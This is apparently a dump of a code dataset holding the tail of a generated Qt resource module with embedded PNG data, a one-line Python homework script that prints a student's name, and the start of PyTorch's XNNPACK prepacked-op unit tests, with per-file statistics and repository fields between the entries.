Y\x0c\xac*\x90\xc5\xe4\x90\x10\xdfw\xed\xdd\xa3\xb7\xdf!'\x90132~\xff\xf9\xcfUG\x88\x95\x05\xe5\x86\x19\x00\x00\x00\x00\xff\xffB\x04\x22\xe4\x84'{\x0d!9a\x8e\x9f\x7f\xfeA\x9a\xa7\x5c\xec\xcc\x9b\xce\xbd\xfa\xfa\xf3/\xf4\xe8c\xc8a\x1d<)\x0c\xac\xd2\x0c\xff\xfe\x8cf\x02\x06\x06\x06X\xba\xe4a\xe0/b`\xf8\xc7\xc0\xc8\x04\x198\xfe\xfb\xef\xff\xea\x93/\xe1\xa3o\xbf\xff\xfe\x17\xe6e\xf5\xd0\x13e@\xde\x7f\xc7\xc0\x00\x00\x00\x00\xff\xffbB2\x86\xe1\xdf\xbf\xff<\x1c\xcc\x91\x16\x92\xdf`!\xce\xce\xc2\xf4\xf8\xdd\x8f\x95'_\xc0.\x83\x80\xcc\xd4s3\x08O\x81i\x1a\x05L\x0c\xff\xfe1\x08u20KBV\xfa@\x8e\x1c\xdbv\xf1\xcd\xb5\xa7_\xb8\xd8\x98\xff\xfdg`bb\xfc\xfc\xe3O\x80\x91\x98\x04?\xe4\xce\x11\x84f\x00\x00\x00\x00\xff\xffBI\xc2\x90@\xf7\xd0\x17\x96\x11\x82e\x82\x7f\xffy9Y\x96\x1e{\x0e\xbb\x88\xe0?\xf4B'\xee\x00\x06\xde\x18\x86\x7f\x7faw\x0b\x8dX\xc0\xcc\xf0\xef/\x03\xb7\x13\x03_\x16\xc3\xff\xbf\x0c\x0c\xcc\x90\xd2\xff\xfd\xd7\xdf\xb3\xf6?\xe1dg\x86T\xc5\x90\x13\x80\x02M\xc4\xfe\xc3\x1a\xfdp\x00\x00\x00\x00\xff\xffB\x89\x00H2\xe7\xe5`\
x091\x13\x87f\x02\xc8\xdd\xb4?\xfeN\xda\xf5\x88\x81\x0163\x0c9\xb5C\xb0\x95\x81\x99\x9f\xe1\xdf\xbf\x11\x9c\x0f \x0dI\x16\x06\xa1^\xe8\xb6H\xd8a\x893\xf6=y\xf1\xf1';\x0b\xd3\x7fX\xf2\xf7\xd6\x17\x91\x14`\x87\x9f\xa0\x08\x07\x00\x00\x00\x00\xff\xffB/\xc4!\x99 \xd8DLI\x94\xeb\xc7\xaf\xbf\x8c\xb0\x8b\x08\x0e\xdex\xb7\xef\xda;&\xe8E\x04L\x0c\x0c\xff\x19X\xe4\x18D\xa73\xfc\xff7r\x9b\xa4\x8c\xcc\x0c\xff\xfe2\x08u2\xb0\x19@\xb6\xa3B\xce\x17\xbe\xf8\xe8\xf3\xa6s\xaf\xf89Y!GD\xfc\xfe\xf3O\x94\x97-\xd6F\x0a\x929\xd0\xcc\x00\x00\x00\x00\xff\xff\xc2X\x9e\xce\xc8\xf0\xff\xff\x7fN6\xe6\x0cg\x99_\xb0e\xa4\x90\xd1\xa1\x99\xfb\x9e|\xff\xf5\x17v\x82\x0a3\x03\xc3\x1f\x06\xeeH\x06\xa1r\x86\x7f\x7f\x18\x18\xd1\xae\x89\x1f\x01\x80\x91\x85\xe1\xef\x1f\x06\xbe8\x06\xfe\x22\xc8\x15\xc4\x90\xad\xbd\xff\xfe\xff\x9f\xba\xe71\xbc\x9a\x85\x9c?\x99h/-\xcc\xc3\xfa\xff?z\xf2g``\x00\x00\x00\x00\xff\xff\xc2\xd2\x8c\x81\x8c\xc79i\x099h\x0a}\x82]D\xc0\xc1\xcat\xef\xd5\xb79\x07\x9e\x22\x1d}\xcc\xcc\xc0\xf0\x97A\xb0\x95\x81\xd3\x9c\xe1\xef\xef\x11V\x1903\xfc\xfb\xc3\xc0\xa6\xcc <\x15~$\x0a\xa4\xaf\xbb\xf2\xc4\xcb\xf3\x0f>q\xb33C\x86\x9a\xbf\xfe\xfck \xcf\x17b*\xf6\xef\xff\x7fFl\x17\xd0\x03\x00\x00\x00\xff\xff\xc2}\x8b\x12\x03C\x96\x8b,7;3\xfc\x0e\x07~.\x96\xa5\xc7\x9e\x1f\xbe\xf9\x1ev#\x0ad\xd0\x88\x89Al5\x03\x9b\xcaHj\x9521\xfc\xff\xcf\xc0,\xc6 \xbe\x81\x81\x89\x87\x81\x81\x81\x81\x81\x11r\xd9\xed\x95'_\xa6\xed}\xcc\xcb\xc9\x02\xbd1\xe6?\x03#\x03C\xae\x9b,\x13l@\x0d\x13\x00\x00\x00\x00\xff\xff\xc2\x1ed\x90\x83,\xe5\x859\xd2\x9dd>}\x83\x9e\xe5\xfd\x9f\x81\x81\x9d\x95\xa9m\xd3\xfd\xe7\x1f~\xc2\xaefbb`\xf8\xc7\xc0\x22\xcb \xb1\x95\x81\x91kd\xccY2B\xfb\xbd\x12\xeb\x18\xd8t\x18\x18\xfe@&\x1d\x19\x19\x19?}\xff\xd3\xb8\xfe\xee\x7f\xd85\xd6,\xcc\x8c\xef\xbf\xfe\x8e\xb2\x92\xd4\x93\xe5\x85\xdd\xba\x83\x05\x00\x00\x00\x00\xff\xff\xc2\x19^\x90d\x1ef&a\xaf)\x88|#\xca\x87o\xbf\x9b\xd6\xdf\xfb\xfd\xf7?l?=3\x03\xc3\x1f\x06V5\x06\xf1\xc5HN\x1c\xae\x80\x91\x81\x81\x89\xe1\xdf_\x06\xd1i\x0c\xec\xd6\x90+\xbc\xfe\xc3Z>\x1d[\xee?|\xf3\x03z\xaf)\x13\xe3\x97\x1f\x7f\xf5\xe4xR\xec\xa5\x91n\x16\xc7\x02\x00\x00\x00\x00\xff\xff\xc2\x97`\x19\x19\x19\x19\x19\x19*|\x14\x05\xb9Y\x7f\xc1nD\xe1\xe5`9u\xffc\xcf\xb6\x07H\x95\x01\x0b\x03\xc3\x1f\x06\xae 
\x06\xf1\x15\xb0a\xbba\x99\x0f\xe0\xa1?\x99\x817\x13ze/\xec\xca\xaf\xd9\x07\x9e\xec\xbc\xf4\x16r\xc53\xa4K\xcb\xc2\xc4X\xed\xa7\xc4\xceJ\xe0\x8em\x00\x00\x00\x00\xff\xff\xc2\x17R\x90\xcb\xb0\xc4\xf8\xd8J\xbd\x14\xbe\xff\x82\x1e>\xf7\xe7\xdf\x7f!n\xd6ug^\xae9\xf5\x92\x99\x89\x11\xb6\xa7\x8c\x85\x81\xe17\x03w\x18,\x0e\x86\xdfp)\x13,\xf4\xa70\xf0\xe500\xfc\x814:\xfe\xfc\xfb\xcf\xc2\xc4\xb8\xef\xda\xbb\xb9\x07\x9f\x0arC\xaf\x18gbb\xfc\xf8\xfdO\x8e\xab\x9c\x8a8\x17\x9e\xc2\x07\x02\x00\x00\x00\x00\xff\xff\x22\x90T!\x05\x91\xb3\xb6P\x94\x95\xc4\xfb/\xb0Y\xcd\x7f\xff\xf98Xz\xb7?<r\xeb\x03\x0b\xe2\x8a2V\x86\xff\xf08`f\xf8\xff\x17v\xa1\xea0\x00L\x0c\xff\xffA\xd3>_6r\xdagab\xbc\xf2\xe4K\xd3\xfa\xbb\x1c\xac\xcc\xff\xe1\xb7=~\xfb\xed\xa5'\x12f.\x8et\xdb#N\x00\x00\x00\x00\xff\xff\x22\x5cV@Z\xa5\xd9.r\xa6J|\xd0V)\x03\x03\x03#\x03;+S\xcd\x9a\xdbg\xee\x7fB\xe4\x03FV\x06\x86?\x0c\xdca\x0c\xd2\x07\x19X\x95\x18\xfe\xfe\x1d\x0e\xfd\x03F\x16\xe8\x18\xb0\xd4V\xe4\xb4\x0f\x09\xdc\xdb/\xbe\x95\xae\xb8\xf5\xef?\x03\x0b\x13#\xe4\x9a\x8b\xaf\xbf\xfe\xaa\x88q\x95\xf9(b\xedva\x02\x00\x00\x00\x00\xff\xff\x22\x1c\x01\x90\xfd\x1c\xac\xcc\x8c\xf5\x81\xca\xc2<\xac?~C\x96\x0f1\xb001\xfe\xfb\xc7P\xb9\xea\xf6\xcd\xe7_\x91\xf2\x01\x0b\x03\xc3\x1f\x06v+\x06\xc9}\x0c\xec:\x0c\x7f\x7f300\x0f\xe1j\x19\xd2\xdbb\x91c\x90\xdc\xcd\xc0\xe9\x05\xbd8\x13\x16\xfa\xcf>\xfc,]q\xeb\xd3\xb7?\xec\xacL\x7f\xff\xffgbd\xf8\xfd\xf7?\x1b3SC\x902/\x073\xe4\x14\x5c\x82\x00\x00\x00\x00\xff\xff\x22\xaa\xb6\x84\x5c\xbe$)\xc0\xde\x11\xa6\xc6\xcc\xc4\xf0\xe7\xdf?fF\x86\xbf\xff\xff\xb3\xb12\xfd\xf8\xfd\xaf`\xc9\xcd\x0b\x0f?3\xa3\xc5\x01\x8b<\x83\xd4Q\x06\xfe\x14\x86\x7f\x7f\x87f\x95\xc0\xcc\xc0\xc0\xc4\xf0\xf7\x0f\x03O0\x83\xf4)\x066}\xb4Z\xf7\xce\xcbo\xb9\x8bn\xbc\xfe\xf4\x8b\x8b\x9d\xf9\xcf\xbf\xffL\x8c\x0c\xff\xfe3\xfc\xfc\xfd\xaf)X\x19r\xd1/1\xc9\x9f\x81\x81\x01\x00\x00\x00\xff\xff\x22\xb6\xb9\x02\x19\x05\xd2\x95\xe5\xe9\x8eP\xfb\xf7\x8f\xe1\xef?\x06fF\x86\xbf\xff\xfe\xb3\xb32}\xf9\xf9\xb7`\xe9\xcd\x13w>B\xe2\xe0?\x03\x03\x03\x03\x0b\x03\xc3?\x06&>\x06\x91\xd9\x0c\xa2S\x18\x18\xd8\x18\xfe\xfd\x1d:Y\x81\x11:\xc8\xf3\xff\x1f\x83P\x03\x83\xf8\x1a\x06fq\xe8\x95\xbd\xb0\xd0\xbf\xf6\xeck\xee\xa2\x1b/>\xfc\x84\x87>\x03\x03\xc3\xb7\x9f\x7f\x1b\x83\x95m\xd5\x05\x89)\xfa\xe1\x00\x00\x00\x00\xff\xffb\xc4s\xd3*&\x80\x18\xbd\xe7\xea\xbb\xda\xb5\xb79Y\x99\x99\x18\x19\xfe\xfeg`fd\xfc\xf3\xef\xff\xdf\x7f\xffK\xbd\x15\xfc\x0cEa\x97\x06100\xfc\x87\xaen\xffy\x9a\xe1m\x09\xc3\xf7C\x0cL\x90\x22\xf5\xef\xe0\xddp\xc3\xc8\xc2\xf0\xff\x0f\xc3?\x06\x06\x0ec\x06\xa1\x0e\x06N\x17\xc8\xf2BHo\xeb?\xc3\x7f&F\xc6C7\xde7n\xb8\xfb\xfb\xcf\x7fvV&x\xe8\x7f\xfa\xfe\xa7\xcc[1\xd4\x8c\xa8\x8a\x17\x19\x00\x00\x00\x00\xff\xff\x22-\x02\x18`q\xb0\xfb\xca\xdb\xfauw\xd9Y\x99\x98\xa1q\xc0\xf0\xef?\xc3\xd7\x9f\x7fc\xad%\xb3\x5c\xe4 \xedW\xc4u\xcf\x90\xf2\xe7\xd3t\x86we\x0c\x7f\xbf001\xc0nC\x1eT\x80\x99\x81\xe1/\xc3?\x06\x06&V\x06\xc1\x06\x06\x81\x0a\xc8-\x18\xd0q\x1eXgj\xd1\x91g3\xf7=aeada\x82\xce;200|\xfe\xfe\xb7\xc4K>\xcc\x5c\x82\xd4\xd0g``\x00\x00\x00\x00\xff\xff\x229\x02\x18P\xe3\x80\x8d\x85\x89\x85\x89\x11\xe2\x14FF\xc6w_~;h\x08\xd6\x04(\x09q\xb3\x22\xb9\x06\xb2\xfd\x80\x89\xe1\xf7-\x86\x8f}\x0c\x9f\x170\xfc\xfb\xc9\xc0\xc4\x08\xbbzn\xc0s\x033\x03\xc3\x7f\x86\x7f\xff\x18\x98\x18\x19\xb8#\x19\x04J\x19\xd8\x0c\x18\xa0\x17\xf4B\x0f\x1effb\xfc\xfe\xebo\xe7\xd6\x07\x9b\xcf\xbd\x16\xe0\x86\x9ek\x08)\xf7\xbf\xfc 
?\xf4\x19\x18\x18\x00\x00\x00\x00\xff\xff\x22'\x02\xe0n:~\xfbC\xd5\xea;\x7f\xfe\xfd\xe7`e\x82\xd4\xc0,\xcc\x8c\x1f\xbf\xfd\x91\x11\xe2\xa8\xf2U4V\xe4\x83g[\x88&hV\xf8u\x99\xe1]\x15\xc3\xb7-\x90s\xd5\x06\xaePb\x84\xa6q\xc8\x94\x12\xa7=\x83P\x1b\x03\xbb\x15\xb2S\xff\xfdg``\xf8\xcf\xc4\xc8x\xf3\xf9\xd7\x96\x8d\xf7n<\xff&\xc0\x05\x1dhcbb\xfc\xf3\xf7\xdf\xaf?\xffk\xfd\x95P/x'\x0d\x00\x00\x00\x00\xff\xff\x223\x02\x18`qp\xe6\xfe\xa7\xea\xd5\xb7?\xff\xf8\xcb\xc3\xce\x0c\xe9\x0d@.\x84\xfb\xff\xff\x7f\x9a\xa3L\x9c\x8d\x14\x03\x03\xc3\xbf\x7f\xff\x19\xa1\xfbd\xff!ZD?O1|\x9c\xc8\xf0u\x15\xc3\xbf?\x0c\x8c\x0c\xb0^\x1b\x1d2\x04#\x03\x03\x13\x03#\x03\xc3\x7fX\xd0s\xfb1\xf0\x171p\xd8C\xbc\x05-\xf1\x19\x18\xfe\xc1\xc2t\xc3\xd9W\x93v=\xfa\xf1\xfb\x1f\xdc\x8f,L\x8c\x90K`\xea\x03\x95\x9d\x10w,\x93\x03\x00\x00\x00\x00\xff\xff\x22?\x02\x18`qp\xf7\xd5\xb7\xfauwo>\xff&\xc0\xc5\x02\xd9f\x03\xc9\x9b\x9f\x7f\xfc1U\xe4\xcfp\x96\xd1\x93\xe5\x85+f``@\x94H\x0c\x0c\x0c\xbf\xae2|\x9e\xcf\xf0e1\xf4h/h\xf5\xc0\x00+\x01\xa8\x08\x98`m\xb0\xbfP\x83\x99\xf9\x19x\x22\x18xS\x18\xd8M`6BGs!#\xfb\x0c\x0c\x0c\xb7_~\x9b\xb9\xef\xc9\xa1\x9b\xef\xb9\xd9\x98\x99\x99\xa1\xcbIX\x98\x18?|\xff##\xc8^\x17\xa8l \xc7KI\xe8300\x00\x00\x00\x00\xff\xff\xa2(\x02\x18`\xc1\xfa\xed\xd7\xdf\xae-\x0f\xb6\x5cx\xcd\xc7\xc9\x02\xef\x10031~\xf9\xf1\x97\x99\x89\xc1\xd7P4\xd5QF\x88\x9b\xf5?\x03\xc3\xff\x7f\xf0;\xcc\x90r\xc3\xdf7\x0c\xdf\xb70|Y\xc6\xf0\xfd\x10\xc3\xbf\x9f\x0c\x0c\xb0A_\x06\x16\xe8jah\x98\x91\xe4TFh\xa0C\x12\xfb\x7f\xd8\xc6g&\x16\x06vK\x06\x9e\x08\x06.\x7f\x06\x16i4\x97@V~012|\xfb\xf9w\xfe\xe1gkN\xbd\xfc\xfe\xeb//'\xcb\xbf\xff\xff!=\xdb\xff\x0c\xff?~\xfbc\xa7!X\xed\xa7$\xcc\xc3Ja\xe8300\x00\x00\x00\x00\xff\xff\xa24\x02\x18\x90Z\x08kN\xbd\x9c\xb2\xe7\xd1\xaf?\xffy8\x98\xa1\x97d12\xfc\xff\xcf\xf0\xf1\xfb\x1f\x19!\x8e\x14{iO}\x11L\xdd(\xdd\xb4\xdfw\x19~\x1ce\xf8\xb6\x99\xe1\xd7Y\x86?\xf7\x11y\x00\x1a\x1fL\xd0\xd2\x03\x02\x90\x1d\x8e\x22\xf8\x8f\x81\xe1\x1fT\xf6?L\x96E\x86\x81\xdd\x90\x81\xcb\x87\x81\xc3\x96\x81U\x13\xa6\xfa/\xd6\xb1\xdbC7\xdf\xcf\xdc\xf7\xe4\xce\xcbo|\x9c,\x90\xdc\xcc\xc0\xc0\xc0\xc8\xc8\xf0\xed\xe7\xdf\xff\xff\x19\x92\xed\xa5\x93\xec\xa5\x91=N\x09\x00\x00\x00\x00\xff\xff\xa2B\x04000\xc0+\xdb\x1b\xcf\xbf\xf6l}p\xee\xe1g\xc8\x95@\x10\xc0\xcc\xc4\xf8\xf3\xcf\xbf\x1f\xbf\xff\x1a\xc9\xf3\x85YH\xd8\xaa\x09\x08r\xa3\x8d\x11\xfd\x87\x9eK\x01\x0f\x8b\xff?\x18~\xdfd\xf8y\x9a\xe1\xc71\x86\xdf7\x18\xfe\xdce\xf8\xfb\x1a\x91\x8a\x09\x02&\x06\x06&a\x06V%\x06Vu\x06v\x0b\x06v\x0b\x06V\x0d\x06&\xf8\xe1U\xffa\xd5,J\xf0}\xf9\xf1\xf7\xf8\x9d\x0f+O\xbe8q\xe7#\x0b3#'+\xf3_\x98\x8d\x903>\xd5%\xb9J<\x15 \x8d\x0b\x06*m\xdb\x05\x00\x00\x00\xff\xff\xa2N\x04@\x00$?\xfe\xfe\xfb\x7f\xc1\xa1\xa7\x8f\xdf\xfd\x80\x1f\x8a\xc0\xf0\x1f:\xb5\xf0\xf5\xe7\xdf\x7f\xff\xff\xabKp{\x1b\x88\x8a\xf1\xb31\xfc\xc7\xf4\xc3?XL\xa0\x0e]\xfc\xfb\xc4\xf0\xf7\x19\xc3\x9fg\x0c\x7f\x9f1\xfcy\xc8\xf0\xf7\x0d\xc3\xff\xef\x0c\xff\xde#\x140\xf110\xf200\x0b2\xb0\xc830K10K2\xb0H\xc3\x0e\xdaA8\x10V\xca\xa3$y\x88\xff?|\xfd\xbd\xed\xe2\x9b\xcbO\xbe0\xfcg\xe0\xe1`\x86\x94\x96\xd0\x810\x06\xc6?\xff\xfe\x0b\xf3\xb0&\xd9I\xf3p0S^\xec \x03\x00\x00\x00\x00\xff\xff\xa2f\x040@o\x85&\xac\xec?\x96\xa0GW\xc2\xc0\xf0\x1f\xba\xdf\x93\xfc1\x8c\xff\x0c\x0c\xff`\x1b\x1a\x18\xf1\x1bB\x84\x93\x18\x18\xa8T\xec 
\x03\x00\x00\x00\x00\xff\xff\xa2r\x040@<\xfd\x0f\x9f\x99L\x8c\x8c\xa4{\xe1?\x02\xc1\xcdF1\xe5?\xa2\xb8\x87\x865\x81\x10\xc7n\x07\xc6\xa1z\x0c0S\xff\x93\xe9r\x02\x00\x00\x00\x00\xff\xffb\xfc7z5\xe1\x80\x02\x00\x00\x00\x00\xff\xffba\x1c\x1a#\x94\xc3\x16\x00\x00\x00\x00\xff\xffby\xff\xf3\xd3@\xbbaD\x03\x00\x00\x00\x00\xff\xffb\x14\x5c\xe08\xd0n\x18\xd1\x00\x00\x00\x00\xff\xffby\xff\xfd\xdd@\xbbaD\x03\x00\x00\x00\x00\xff\xffbad\x1a\xfa\xf3\xe6C\x19\x00\x00\x00\x00\xff\xffba\x1a\xdd\xea5\xa0\x00\x00\x00\x00\xff\xffb\xf9\xfb\xf3\xe3@\xbbaD\x03\x00\x00\x00\x00\xff\xffb\x5cyw\xf7@\xbbaD\x03\x00\x00\x00\x00\xff\xff\xa2~Ox\x14\x90\x04\x00\x00\x00\x00\xff\xffb\xf93z\x04\xd0\x80\x02\x00\x00\x00\x00\xff\xffba\xfc?Z\x09\x0f$\x00\x00\x00\x00\xff\xff\x1a-\x82\x06\x18\x00\x00\x00\x00\xff\xffb9p\xfd=aU\xa3\x80f\x00\x00\x00\x00\xff\xffb4\xab?1\xd0n\x18\xd1\x00\x00\x00\x00\xff\xffb\xe1\xe3\x1cQ\xbb\x1b\x07\x1d\x00\x00\x00\x00\xff\xff\x82\xed\xe7\x1b\x05\x03\x04\x00\x00\x00\x00\xff\xff\x1am\x02\x0d0\x00\x00\x00\x00\xff\xff\x1a\x8d\x80\x01\x06\x00\x00\x00\x00\xff\xff\x03\x00\x1f\xbf\x8a2{J\xae\xcd\x00\x00\x00\x00IEND\xaeB`\x82"
qt_resource_name = b"\x00\x0c\x0f[W\xdc\x00e\x00x\x00a\x00m\x00p\x00l\x00e\x00s\x00.\x00x\x00m\x00l\x00\x09\x04f\x8a\xbc\x00d\x00e\x00m\x00o\x00s\x00.\x00x\x00m\x00l\x00\x06\x07\x03}\xc3\x00i\x00m\x00a\x00g\x00e\x00s\x00\x0c\x0a\xf0\xbf'\x00q\x00t\x004\x00-\x00l\x00o\x00g\x00o\x00.\x00p\x00n\x00g\x00\x0b\x05R\xff'\x00r\x00b\x00-\x00l\x00o\x00g\x00o\x00.\x00p\x00n\x00g"
qt_resource_struct = b"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x01\x00\x00\x00\x1e\x00\x00\x00\x00\x00\x01\x00\x00\x1e\xed\x00\x00\x006\x00\x02\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00f\x00\x00\x00\x00\x00\x01\x00\x00Lj\x00\x00\x00H\x00\x00\x00\x00\x00\x01\x00\x00\x22R"
def qInitResources():
    # Register the embedded resource data (directory structure, names, payload) with Qt.
    QtCore.qRegisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
def qCleanupResources():
    # Unregister the resource data; the mirror image of qInitResources().
    QtCore.qUnregisterResourceData(0x01, qt_resource_struct, qt_resource_name, qt_resource_data)
qInitResources()
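# --- Usage sketch (not part of the generated module) ---
# Modules like the one above are emitted by Qt's resource compiler (pyrcc) from
# a .qrc file. Importing the module runs qInitResources(), after which the
# embedded files are reachable through the ":/" prefix. A minimal, hedged
# example, assuming PyQt4 (matching the QtCore import used by this module); the
# resource paths follow the names registered in qt_resource_name above:
#
#     from PyQt4 import QtCore, QtGui
#
#     pixmap = QtGui.QPixmap(":/images/qt4-logo.png")  # registered under images/
#     f = QtCore.QFile(":/examples.xml")               # registered at the root
#     if f.open(QtCore.QIODevice.ReadOnly):
#         data = bytes(f.readAll())
#         f.close()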
| 3,534.181818
| 76,552
| 0.743531
| 16,738
| 77,752
| 3.446708
| 0.180069
| 0.043265
| 0.039313
| 0.026209
| 0.138583
| 0.092597
| 0.056265
| 0.03836
| 0.015046
| 0.011059
| 0
| 0.239151
| 0.016373
| 77,752
| 21
| 76,553
| 3,702.47619
| 0.515187
| 0.002341
| 0
| 0
| 0
| 0.333333
| 0.995294
| 0.906256
| 0
| 0
| 0.000103
| 0
| 0
| 1
| 0.222222
| false
| 0
| 0.111111
| 0
| 0.333333
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| d4e5147172dea913d443fa6dccdf12d6065103d4
| 165
| py
| Python
| first-homework.py
| FabioniMacaroni/ASTR-119
| 58fc383e2c876dbd1ee2d4b300d50a1d299068a2
| ["MIT"] | null | null | null
| first-homework.py
| FabioniMacaroni/ASTR-119
| 58fc383e2c876dbd1ee2d4b300d50a1d299068a2
| ["MIT"] | 2
| 2021-09-30T03:39:58.000Z
| 2021-09-30T05:50:39.000Z
| first-homework.py
| FabioniMacaroni/ASTR-119
| 58fc383e2c876dbd1ee2d4b300d50a1d299068a2
| ["MIT"] | null | null | null |
#!/usr/bin/env python3
# This program writes out my full name and preferred pronouns.
print("Fabian Arias, he/him/his")  # print Fabian Arias, he/him/his
| 27.5
| 70
| 0.727273
| 28
| 165
| 4.285714
| 0.75
| 0.183333
| 0.216667
| 0.266667
| 0.316667
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007299
| 0.169697
| 165
| 5
| 71
| 33
| 0.868613
| 0.715152
| 0
| 0
| 0
| 0
| 0.615385
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 7
| d4e59d1c55f9a2c045e90d722b955cb1eb80b0ed
| 53,953
| py
| Python
| test/test_xnnpack_integration.py
| Stonepia/pytorch
| 82006ba46074226a071c25dd2e03dc4828941544
| ["Intel"] | 1
| 2021-06-17T13:02:45.000Z
| 2021-06-17T13:02:45.000Z
| test/test_xnnpack_integration.py
| Stonepia/pytorch
| 82006ba46074226a071c25dd2e03dc4828941544
| ["Intel"] | 1
| 2022-01-18T12:17:29.000Z
| 2022-01-18T12:17:29.000Z
| test/test_xnnpack_integration.py
| Stonepia/pytorch
| 82006ba46074226a071c25dd2e03dc4828941544
| ["Intel"] | 2
| 2021-07-02T10:18:21.000Z
| 2021-08-18T10:10:28.000Z
|
import unittest
import torch
import torch.backends.xnnpack
from torch.nn import functional as F
from torch.utils.mobile_optimizer import optimize_for_mobile
from torch.testing import FileCheck
import torch.testing._internal.hypothesis_utils as hu
from torch.testing._internal.common_utils import TestCase, run_tests, slowTest
from hypothesis import given, assume
from hypothesis import strategies as st
import io
import itertools
from torch.testing._internal.common_utils import TEST_WITH_TSAN
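# The tests below exercise PyTorch's XNNPACK integration: each test computes a
# reference result with the ordinary torch.nn.functional op and compares it,
# within rtol/atol, against the corresponding prepacked operator
# (torch.ops.prepacked.*_clamp_prepack / *_clamp_run), with hypothesis sweeping
# shapes and hyperparameters.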
@unittest.skipUnless(torch.backends.xnnpack.enabled,
" XNNPACK must be enabled for these tests."
" Please build with USE_XNNPACK=1.")
@unittest.skipIf(TEST_WITH_TSAN, "TSAN fails with XNNPACK; there does not seem to be a good reason for the failures.")
class TestXNNPACKOps(TestCase):
@given(batch_size=st.integers(0, 3),
data_shape=hu.array_shapes(1, 3, 2, 64),
weight_output_dim=st.integers(2, 64),
use_bias=st.booleans())
def test_linear(self, batch_size, data_shape, weight_output_dim, use_bias):
data_shape = [batch_size] + list(data_shape)
input_data = torch.rand(data_shape)
weight = torch.rand((weight_output_dim, data_shape[-1]))
if use_bias:
bias = torch.rand((weight_output_dim))
else:
bias = None
ref_result = F.linear(input_data, weight, bias)
packed_weight_bias = torch.ops.prepacked.linear_clamp_prepack(weight, bias)
output_linearprepacked = torch.ops.prepacked.linear_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
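    # The test above illustrates the general prepacked-op contract: pack the
    # weight/bias once, then run many times. A hedged standalone sketch with
    # illustrative shapes (not taken from the test):
    #   w, b, x = torch.rand(8, 4), torch.rand(8), torch.rand(2, 4)
    #   packed = torch.ops.prepacked.linear_clamp_prepack(w, b)
    #   y = torch.ops.prepacked.linear_clamp_run(x, packed)  # ~= F.linear(x, w, b)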
@given(input_size=st.integers(2, 32),
weight_output_dim=st.integers(2, 64),
use_bias=st.booleans())
def test_linear_1d_input(self, input_size, weight_output_dim, use_bias):
input_data = torch.rand(input_size)
weight = torch.rand((weight_output_dim, input_data.shape[-1]))
if use_bias:
bias = torch.rand((weight_output_dim))
else:
bias = None
ref_result = F.linear(input_data, weight, bias)
packed_weight_bias = torch.ops.prepacked.linear_clamp_prepack(weight, bias)
output_linearprepacked = torch.ops.prepacked.linear_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result, output_linearprepacked, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(0, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
dilation,
use_bias,
format):
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
kernels = (kernel_h, kernel_w)
strides = (stride_h, stride_w)
paddings = (pad_h, pad_w)
dilations = (dilation, dilation)
assume(height + 2 * paddings[0]
>= dilations[0] * (kernels[0] - 1) + 1)
assume(width + 2 * paddings[1]
>= dilations[1] * (kernels[1] - 1) + 1)
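        # The two assume() calls above discard parameter draws for which the
        # padded input is smaller than the dilated kernel, i.e. they keep only
        # cases with H + 2*pad >= dilation*(kernel - 1) + 1, so the convolution
        # output is non-empty.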
input_data = torch.rand((batch_size, input_channels, height, width))
if (format is not None):
input_data = input_data.contiguous(memory_format=format)
weight = torch.rand((output_channels, input_channels_per_group, kernel_h, kernel_w))
bias = None
if use_bias:
bias = torch.rand((output_channels))
ref_result = F.conv2d(input_data, weight, bias,
strides, paddings, dilations, groups)
packed_weight_bias = torch.ops.prepacked.conv2d_clamp_prepack(weight, bias,
strides, paddings, dilations, groups)
xnnpack_result = torch.ops.prepacked.conv2d_clamp_run(input_data, packed_weight_bias)
torch.testing.assert_allclose(ref_result, xnnpack_result, rtol=1e-2, atol=1e-3)
@given(batch_size=st.integers(1, 3),
input_channels_per_group=st.integers(1, 32),
height=st.integers(5, 64),
width=st.integers(5, 64),
output_channels_per_group=st.integers(1, 32),
groups=st.integers(1, 16),
kernel_h=st.integers(1, 7),
kernel_w=st.integers(1, 7),
stride_h=st.integers(1, 2),
stride_w=st.integers(1, 2),
pad_h=st.integers(0, 2),
pad_w=st.integers(0, 2),
output_pad_h=st.integers(0, 2),
output_pad_w=st.integers(0, 2),
dilation=st.integers(1, 2),
use_bias=st.booleans(),
format=st.sampled_from([None, torch.preserve_format, torch.contiguous_format, torch.channels_last]))
def test_conv2d_transpose(self,
batch_size,
input_channels_per_group,
height,
width,
output_channels_per_group,
groups,
kernel_h,
kernel_w,
stride_h,
stride_w,
pad_h,
pad_w,
output_pad_h,
output_pad_w,
dilation,
use_bias,
format):
input_channels = input_channels_per_group * groups
output_channels = output_channels_per_group * groups
